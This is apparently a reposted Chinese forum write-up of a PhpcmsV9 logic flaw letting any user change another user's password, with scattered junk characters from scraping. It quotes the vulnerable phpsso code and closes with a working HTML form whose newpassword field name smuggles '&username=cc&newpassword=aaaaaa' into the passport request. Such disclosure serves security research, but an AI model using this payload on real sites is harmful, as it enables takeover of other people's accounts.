PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

admin

提到的通行证的代码：
$ N/ K; R( x1 R6 \& T) m

" [6 Z# K8 q9 ^' Lparse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);

在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。

( |& }" B( u! @我把它留给了你们。
不知道你们发现了它没有。
1 r2 [/ u! ?" ^0 y+ \# y6 H1 d
6 `& g9 c& u; a% J我们知道parse_str类似将http请求转换成php变量的函数，所以，也像http请求在php的环境下一样，如果提交?a=sss&a=aaa，那么a的结果会是aaa，不是sss。

所以我们知道这个函数有一个问题了，如果后面提交一个内容，它会覆盖前面的。
) E( e* u; {. d
3 i* R9 ]& \7 F, ]0 s也就是

username=zhangsan&username=lisi的话，那么用户名就不是zhangsan了。
: D# K9 o# z7 r4 @
, A' F) E$ a* `' [7 r# l要构造这样的请求，我们还是要回到通行证的client看看，我们有没有这样的机会。


其实我们有这样的机会，看看代码，如下：


) k! v* n: p6 T1 J1 w/ K5 vpublic function auth_data($data) {
0 ~( Z, x0 i- u" p) r1 Y6 w" [                $s = $sep = '';
                foreach($data as $k => $v) {
                        if(is_array($v)) {
                                $s2 = $sep2 = '';
                                foreach($v as $k2 => $v2) {
. J0 ~  J0 Q( \+ M0 u) A                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
                                        $sep2 = '&';
                                }
                                $s .= $sep.$s2;
                        } else {
9 U0 a$ P# s( f                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
3 _1 w; L' o2 d" Q. [                        }
                        $sep = '&';
+ G- E' L. v0 `8 @3 U7 G, t/ U                }
$ C& t, g! _& i. {
                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
  ?6 ~( I8 i) K5 T$ }4 w                return $auth_s;
        }
) k: X. N* E2 h5 s4 L& B4 ^* V
: F: N2 T9 X6 q, h1 w, e  I) }* k可能我没说明白，对，传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话，那么我就能重写这样的东西。

举个例子

$a[aaa=a&bbb] = 'a';

! c" b1 F) w: x: p  t1 _% t会变成aaa=a&bbb=a

; a% o7 i6 a, Q( [6 d2 @2 I明白了么，对，就是通过没有注意到的key，我们可以构造出多余的参数来。

这个时候，我们可以再去看一个函数。
0 T* q% n4 h; s) H: p$ Q% V4 g8 Q
8 @( w" U3 @0 S( L) @' T就在这个文件内：
7 {% U; ^, n2 {& r# w1 O7 _

public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
                if($email && !$this->_is_email($email)) {
                        return -4;
% T, c( P" G1 f0 u8 B+ I2 P/ C                }
5 G# `3 c. M6 j1 u5 G! Z                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
4 A% X, T& h/ ^- c7 B/ B        }

; q2 Q! X9 r- ]9 p4 T& i+ b  Y这是向通行证发了这样一个请求。

  C+ U/ T9 m" G8 j5 R我们再跟到通信证代码里去看看，就会有所发现。

* y6 s* @9 l$ `5 T
public function edit() {
//能省就省，太长了不是吗？

if($this->username) {
//如果提交了用户名，则按照用户名修改记录，反之，按照uid来修改记录。
2 t% Z+ v6 j  t- {                                $res = $this->db->update($data, array('username'=>$this->username));
                        } else {
                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
                                $res = $this->db->update($data, array('uid'=>$this->uid));
4 v  j+ t' r/ O8 \                        }

! y! F8 L8 ?& p' @5 V1 G2 g好，我们知道了，如果提交了用户名，就会按照用户名来修改记录，不然就按照uid，我们看看函数结构：
6 n) H4 n7 F3 z1 \0 p' ~0 N$ [: A
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')

3 n( N* W- i1 i+ p* i/ }3 T0 l很好，uid要是无法控制的话，后面只剩下一个random了，但是username就在第一个，只要email，password，newpassword，有任何一个可以控制，就可以修改密码了。

. {' E" Q1 R0 m0 ]我当然找到了：
phpcms9/phpcms/modules/member/index.php

$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
' {( {+ O- H# N1 _& k0 R8 |4 y- Q
然后就没有然后了。

<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
( i. d2 {$ d5 {6 x9 R                                <table width="100%" cellspacing="0" class="table_form">
                                        <tr>
                                                <th width="80">邮箱：</th>        
4 J& B! n4 \" c% n                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
                                        </tr>
7 x7 j( B% ]2 p& P4 ]& T6 I) R                                        <tr>
                                                <th width="80">原密码：</th>        
                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
8 e# {: b' X8 [6 L3 P9 Z( L& H: [                                        </tr>
1 I7 |0 ?' b$ u( V! S6 s                                        <tr>
5 j" g; M' u! i& ?                                                <th>新密码：</th>
  V! m: B4 T. o6 O* E8 w! @0 f3 @                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
: t  h* B+ [) y                                        </tr>
                                        <th></th>
                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
                                        </tr>
                                </table>
3 ~6 k* x. q* O* Z2 G& @- S
                               
                        </form>
- i$ b; x- R. ?' s5 `1 m  W